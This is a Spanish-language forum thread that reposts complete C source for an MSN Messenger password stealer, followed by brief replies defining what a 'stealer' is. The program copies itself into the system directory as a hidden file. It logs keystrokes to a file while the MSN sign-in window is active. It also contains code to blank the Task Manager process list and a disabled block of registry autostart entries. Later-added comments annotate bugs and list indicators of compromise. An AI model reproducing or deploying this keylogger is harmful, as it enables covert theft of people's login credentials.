Stealer MSN

Iniciado por ANTRAX, Mayo 22, 2011, 10:00:32 PM



Mayo 22, 2011, 10:00:32 PM Ultima modificación: Febrero 08, 2014, 05:47:50 PM por Expermicid
Código: c
#include <stdlib.h>	
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <Winuser.h> 
#include <string.h>

// all includes should be standard in dev

/*
   Name: KOrUPt(not tellin)
   Author: KOrUPt
   Description: MSN PWD stealer, searches for PWD prompt and saves it to wordsv80.ini file, maybe someone could add smtp to improve it
   Date Written: 01/10/06 - 04/10/06
   Copyright Holder: KOrUPt, you MAY use, add to this code, but please let me know of any improvments you make, thanks.
*/


/*
 * keys - append a textual form of one virtual-key code to a log file.
 *
 * key:  virtual-key code to record (the caller in this listing passes the
 *       codes it polled with GetAsyncKeyState).
 * file: path of the log file; it is opened in append mode ("a+") and closed
 *       again on every call.
 *
 * Returns nothing.
 *
 * Analysis notes:
 *  - Everything is written in clear text, so the log file is directly
 *    readable evidence of what was captured.
 *  - The tests below are independent `if`s, not an else-if chain, so one key
 *    code can produce several writes (e.g. 13 is also VK_RETURN, 32 is also
 *    VK_SPACE, VK_NUMLOCK is tested twice).
 *  - The fopen() result is not checked before it is handed to fprintf().
 */
void keys(int key,char *file) // if you try and view the exe in notepad it discloses
{ // quite alot of source code(not good), so i may change the key output to codes instead

FILE *key_file;

key_file = fopen(file,"a+");

Sleep(10);

// 8 is VK_BACK (backspace); it is logged as "[del]".
if (key==8)

fprintf(key_file,"%s","[del]");

// 13 is VK_RETURN; the VK_RETURN test further down matches the same key.
if (key==13)

fprintf(key_file,"%s","\n");

// 32 is VK_SPACE; the VK_SPACE test further down matches the same key.
if (key==32)

fprintf(key_file,"%s"," ");

if (key==VK_CAPITAL)

fprintf(key_file,"%s","[Caps L]");

if (key==VK_TAB)

fprintf(key_file,"%s","[TAB]");

if (key ==VK_CONTROL)

fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)

fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");

if (key ==VK_END)

fprintf(key_file,"%s","[END]");

if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");

if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");

if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");

if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");

if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");

if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");

if (key ==VK_RETURN)

fprintf(key_file,"%s","[ENTER]\n\n");

if (key ==VK_SHIFT)

fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_SPACE)

fprintf(key_file,"%s","[SPACE]");

// Mouse buttons; the caller in this listing starts polling at code 8, so
// these two branches are not reached from WinMain.
if (key ==VK_LBUTTON)

fprintf(key_file,"%s","[LM B]");

if (key ==VK_RBUTTON)

fprintf(key_file,"%s","[RM B]");

if (key ==VK_MENU)

fprintf(key_file,"%s","[ALT]");

if (key ==VK_LWIN)

fprintf(key_file,"%s","[Windows key]");

if (key ==VK_ADD)

fprintf(key_file,"%s","[+]");

if (key ==VK_SUBTRACT)

fprintf(key_file,"%s","[-]");

if (key ==VK_DECIMAL)

fprintf(key_file,"%s","[.]");

if (key ==VK_DIVIDE)

fprintf(key_file,"%s","[DIVIDE KEY]");

// Numeric keypad digits get a bracketed tag here and are written again as
// plain digits by the 96..105 range test below.
if (key ==VK_NUMPAD0)

fprintf(key_file,"%s","[NUMPAD 0]");

if (key ==VK_NUMPAD1)

fprintf(key_file,"%s","[NUMPAD 1]");

if (key ==VK_NUMPAD2)

fprintf(key_file,"%s","[NUMPAD 2]");

if (key ==VK_NUMPAD3)

fprintf(key_file,"%s","[NUMPAD 3]");

if (key ==VK_NUMPAD4)

fprintf(key_file,"%s","[NUMPAD 4]");

if (key ==VK_NUMPAD5)

fprintf(key_file,"%s","[NUMPAD 5]");

if (key ==VK_NUMPAD6)

fprintf(key_file,"%s","[NUMPAD 6]");

if (key ==VK_NUMPAD7)

fprintf(key_file,"%s","[NUMPAD 7]");

if (key ==VK_NUMPAD8)

fprintf(key_file,"%s","[NUMPAD 8]");

if (key ==VK_NUMPAD9)

fprintf(key_file,"%s","[NUMPAD 9]");

if (key ==VK_F1)

fprintf(key_file,"%s","[F1 KEY]");

if (key ==VK_F2)

fprintf(key_file,"%s","[F2 KEY]");

if (key ==VK_F3)

fprintf(key_file,"%s","[F3 KEY]");

if (key ==VK_F4)

fprintf(key_file,"%s","[F4 KEY]");

if (key ==VK_F5)

fprintf(key_file,"%s","[F5 KEY]");

if (key ==VK_F6)

fprintf(key_file,"%s","[F6 KEY]");

if (key ==VK_F7)

fprintf(key_file,"%s","[F7 KEY]");

if (key ==VK_F8)

fprintf(key_file,"%s","[F8 KEY]");

if (key ==VK_F9)

fprintf(key_file,"%s","[F9 KEY]");

if (key ==VK_F10)

fprintf(key_file,"%s","[F10 KEY]");

if (key ==VK_F11)

fprintf(key_file,"%s","[F11 KEY]");

if (key ==VK_F12)

fprintf(key_file,"%s","[F12 KEY]");

// Second test of VK_NUMLOCK: the key is logged under two different tags.
if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUMLOCK KEY]");

if (key ==VK_SCROLL)

fprintf(key_file,"%s","[SCROLL LOCK]");


/*   // WONT WORK ON WIN 9X


if (key ==VK_OEM_PLUS)

fprintf(key_file,"%s","[+]");

if (key ==VK_OEM_COMMA)

fprintf(key_file,"%s","[,]");

if (key ==VK_OEM_MINUS)

fprintf(key_file,"%s","[-]");

if (key ==VK_OEM_PERIOD)

fprintf(key_file,"%s","[.]");

*/

// 190 is VK_OEM_PERIOD and 110 is VK_DECIMAL; VK_DECIMAL was already logged
// as "[.]" above, so that key yields two writes.
if (key ==190 || key==110)

fprintf(key_file,"%s",".");


// 96..105 are VK_NUMPAD0..VK_NUMPAD9; subtracting 48 maps them to the ASCII
// codes of '0'..'9'. `key` itself is modified, which matters for the next test.
if (key >=96 && key <= 105){

key = key - 48;

// NOTE(review): "%s" is given the address of an int, not a char string; what
// is printed is whatever bytes `key` has in memory up to the first zero byte
// (on little-endian x86 that is the low byte only).
fprintf(key_file,"%s",&key);

}

// 48..57 are the top-row digit keys; the range as written also admits 58 and
// 59. A keypad digit rewritten by the block above matches here as well and is
// written a second time.
if (key >=48 && key <= 59)

fprintf(key_file,"%s",&key);



// This condition is always true: no value can equal both constants at once.
if (key !=VK_LBUTTON || key !=VK_RBUTTON){

// 65..90 are the letter keys A..Z.
if (key >=65 && key <=90){

// A non-zero GetKeyState(VK_CAPITAL) result logs the letter in upper case;
// otherwise 32 is added to get the lower-case ASCII letter. Shift is not
// consulted here; it only appears in the log as a separate "[SHIFT]" tag.
if (GetKeyState(VK_CAPITAL))

fprintf(key_file,"%s",&key);
else

{

key = key +32;

fprintf(key_file,"%s",&key);



}
}

}

fclose(key_file);



}


// File-scope state shared by the functions below.
char buffer[300] = "";   // receives the foreground window title in WinMain
HWND currentwin;         // foreground window handle, refreshed on every poll in WinMain
DWORD pid;               // written by GetWindowThreadProcessId in WinMain; not read in this listing
unsigned char reg[2] = "1";   // not referenced anywhere in this listing
// NOTE(review): a function call as a file-scope initializer is accepted by C++
// but is not a constant expression in C, so this listing presumably was built
// as C++ despite the "c" label.
HMODULE modH = GetModuleHandle(0);   // handle of the running executable's own module
char dir[255];           // system directory path, later extended with "\\Sndserv.exe"
char dir2[MAX_PATH];     // full path of the running executable (GetModuleFileName)
char dir3[MAX_PATH];     // shadowed by a local of the same name in WinMain; unused otherwise
char KeyLogPath[MAX_PATH];   // holds dir path for wordsv80.ini


  // Functions

/*
 * block - EnumChildWindows callback passed by HideProgram.
 *
 * hwnd:   child window currently being enumerated.
 * lParam: unused.
 *
 * Returns FALSE (stop enumerating) after clearing a matching list view,
 * TRUE (keep enumerating) otherwise.
 *
 * Only the rows displayed by the matched list-view control are removed;
 * nothing in this function touches the process itself.
 */
BOOL CALLBACK block(HWND hwnd,LPARAM lParam)  // used to hide from taskmgr
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
// NOTE(review): 249 is passed as the buffer length, but classname holds 150 bytes.
GetClassName(hwnd,classname,249);

   
// Match a child whose text contains "Processes" and whose window class
// contains "SysListView32".
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{
SendMessage(hwnd,LVM_DELETEALLITEMS,0,0);  // clears Taskmgr every x seconds
return FALSE;
}
return TRUE;
}

/*
 * HideProgram - endless loop that looks up the top-level window titled
 * "Windows Task Manager" and runs block() over its child windows.
 *
 * Takes no parameters and never returns (the loop has no exit).
 *
 * NOTE(review): nothing in this listing calls this function or starts a
 * thread on it, so as shown the Task Manager tampering is not active.
 */
DWORD WINAPI HideProgram() // also used to hide from taskmgr
{
  for(;;)
{
Sleep(5);
// FindWindow's result is passed straight to EnumChildWindows without a check
// for the case where no such window exists.
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);   // calls block function evrey 5 milee seconds
}
}



/*
 * WinMain - program entry point. None of the four parameters is used.
 *
 * As written in this listing it:
 *   1. builds the log path "<Windows directory>//wordsv80.ini" in KeyLogPath;
 *   2. copies its own executable to "<system directory>\Sndserv.exe" and marks
 *      the copy hidden, read-only and system;
 *   3. (disabled - the code sits inside a comment block) would register
 *      "Sndserv.exe" under four HKEY_LOCAL_MACHINE autostart keys;
 *   4. polls forever and, while the foreground window title contains the MSN
 *      Messenger sign-in caption, passes pressed key codes to keys().
 *
 * Returns 0 only through the Ctrl+Tab+F5+F8 exit path.
 *
 * Artifacts named in this listing that a responder can look for: the file
 * wordsv80.ini in the Windows directory, a hidden/system/read-only
 * Sndserv.exe in the system directory, and (from the disabled block) the value
 * names 1x00387z, 62x402b, 87x409x and 95x00x8z under the
 * Software\Microsoft\Windows\CurrentVersion Run, RunServicesOnce,
 * RunServices and RunOnce keys.
 */
int WINAPI WinMain(HINSTANCE Instance, HINSTANCE PreviousInstance, LPSTR CommandLine,int ShowCommand)
{

char i;
GetWindowsDirectory(KeyLogPath,sizeof(KeyLogPath));
// strcat is unbounded; the result of GetWindowsDirectory is not checked first.
strcat(KeyLogPath,"//wordsv80.ini");   // this is the file that keys are saved to



   // Add to system folder

GetModuleFileName(modH, dir2, 256);
GetSystemDirectory(dir,255);

// NOTE(review): dir is 255 bytes and is filled with up to 255 characters
// before this unbounded append.
strcat(dir,"\\Sndserv.exe"); // Name of program, was going to use a NeverShowExt key to hide a secondry extension,
// FALSE as the last argument lets CopyFile overwrite an existing file of that name.
CopyFile(dir2,dir,FALSE); //  but dont know how to change the icon pic, lol, will learn how to soon though
// This local shadows the file-scope dir3; it is only used by the disabled
// registry block below.
unsigned char dir3[25] = "Sndserv.exe";
SetFileAttributes(dir, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM); // work it out



// Add to registry

// I think weird decimal vaules makes it less likly to be deleted because it
// hasnt got any spefic name, it could be somthing really importent, dont forget,
// most people are quite scared of editing there reigstry in case they ruin the whole pc,
// if they see something they dont understand, then the old phase "better save than sorry" springs to mind
// i think theyd rather leave it than risk it, of course if there sure they know what there doin then fine,
// but im talkin about the N0oBs here, sorry noobs lol

// oh well back to the code
// The whole registry section below is commented out, so this listing does
// not create any autostart entry. Had it been enabled, the return values of
// RegOpenKeyEx and RegSetValueEx would not have been checked.
/*
HKEY key1;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &key1 );
RegSetValueEx(key1, "1x00387z",0,REG_SZ, dir3,sizeof(dir3));
RegCloseKey(key1);


HKEY key2;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce",0,KEY_SET_VALUE, &key2 );
RegSetValueEx(key2, "62x402b",0,REG_SZ, dir3,sizeof(dir3)); // again weird decimal names,
RegCloseKey(key2); //  i dont fully know how this key will react on startup, should be alright lol



HKEY key3;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE, &key3 );
RegSetValueEx(key3, "87x409x",0,REG_SZ, dir3,sizeof(dir3)); // yey more weird decimal names lol
RegCloseKey(key3);

HKEY key4;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",0,KEY_SET_VALUE, &key4 );
RegSetValueEx(key4, "95x00x8z",0,REG_SZ, dir3,sizeof(dir3)); // i think you get the msg
RegCloseKey(key4);


// was goin to disable regedit, but decided not to
// in case made the user suspicuos, i prefer the stealth method

  */



  while(1)
{
Sleep(20);   // to some save cpu



// Just in case we need an emergency exit
   // All four keys must be reported as down in the same pass.
   if (GetAsyncKeyState(VK_CONTROL) && GetAsyncKeyState(VK_TAB) && GetAsyncKeyState(VK_F5) && GetAsyncKeyState(VK_F8))
   {
   MessageBox (NULL, "" , "", 0 + MB_ICONEXCLAMATION); // no information disclosed, just notfication
return 0;
   }

// cannot close program while login box is present
jump:
currentwin =  GetForegroundWindow();
GetWindowText(currentwin,(char*)buffer,300);
// Capture is gated on the foreground window title containing this exact
// caption; with any other window in front nothing is logged.
if(strstr(buffer,"Sign in to .NET messenger Service- MSN Messenger"))  // or anything else you want a password to lol
{
// pid is stored here but not read again anywhere in this listing.
GetWindowThreadProcessId(currentwin,&pid);

// NOTE(review): i is a plain char; where char is signed it can never exceed
// 127, so i<=190 would stay true and this loop would end only through the
// goto below - confirm against the compiler used.
for(i=8;i<=190;i++) // activate keyloger
{
// -32767 is 0x8001 as a SHORT: the key is down now and was pressed since the
// previous GetAsyncKeyState call for it.
if (GetAsyncKeyState(i) == -32767)
{




keys (i,KeyLogPath);   // loop through keys function and add keys pressed to file


  // Jumping back skips the Sleep(20) and the exit-combination check at the
  // top of the while loop.
  goto jump; // to recheck if logon window is still active, if not continue searching untill found
}
}
}
}
}



¿Cuál es la función de esto?   :o :o (¡Pusiste buenos códigos fuente! ¡Gracias!)

Stealer (en español "ladrón de información") es el nombre genérico de programas informáticos maliciosos del tipo troyano, que se introducen a través de internet en un ordenador con el propósito de obtener de forma fraudulenta información confidencial del propietario, tal como su nombre de acceso a sitios web, contraseña o número de tarjeta de crédito.

Infostealer puede afectar también al servicio de correo electrónico MSN Messenger, enviando mensajes falsos e incluso introduciendo en ellos datos incluidos por los usuarios en sus mensajes a través de dicho servicio.

;)